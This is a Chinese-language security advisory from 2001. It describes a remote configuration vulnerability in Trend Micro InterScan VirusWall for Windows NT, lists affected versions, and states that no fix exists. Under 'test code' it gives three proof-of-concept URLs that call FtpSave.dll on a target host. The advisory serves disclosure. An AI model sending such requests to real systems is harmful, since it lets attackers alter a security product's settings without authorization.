|
|
Trend InterScan VirusWall存在远程可配置漏洞
发布时间:2001-06-05
更新时间:2001-06-05
严重程度:高
威胁程度:权限提升
错误类型:输入验证错误
利用方式:服务器模式
受影响系统Trend Micro InterScan VirusWall for Windows NT 3.51
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5.1SP5
- Microsoft Windows NT 3.5.1SP4
- Microsoft Windows NT 3.5.1SP3
- Microsoft Windows NT 3.5.1SP2
- Microsoft Windows NT 3.5.1SP1
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 3.5
Trend Micro InterScan VirusWall for Windows NT 3.5
- Microsoft Windows NT 3.5.1SP5
- Microsoft Windows NT 3.5.1SP4
- Microsoft Windows NT 3.5.1SP3
- Microsoft Windows NT 3.5.1SP2
- Microsoft Windows NT 3.5.1SP1
- Microsoft Windows NT 3.5
Trend Micro InterScan VirusWall for Windows NT 3.4 and previous
- Microsoft Windows NT 4.0 详细描述
Interscan Viruswall是病毒防火墙,可以扫描通过SMTP,FTP,HTTP
的数据,其中在CGI目录中的程序存在问题,允许远程攻击者发送请求
来改变配置。
测试代码
http://target/interscan/cgi-bin/FtpSave.dll?no
http://target/interscan/cgi-bin/FtpSave.dll?yes
http://target/interscan/cgi-bin/FtpSave.dll?I'm%20here
解决方案
尚无
相关信息
|
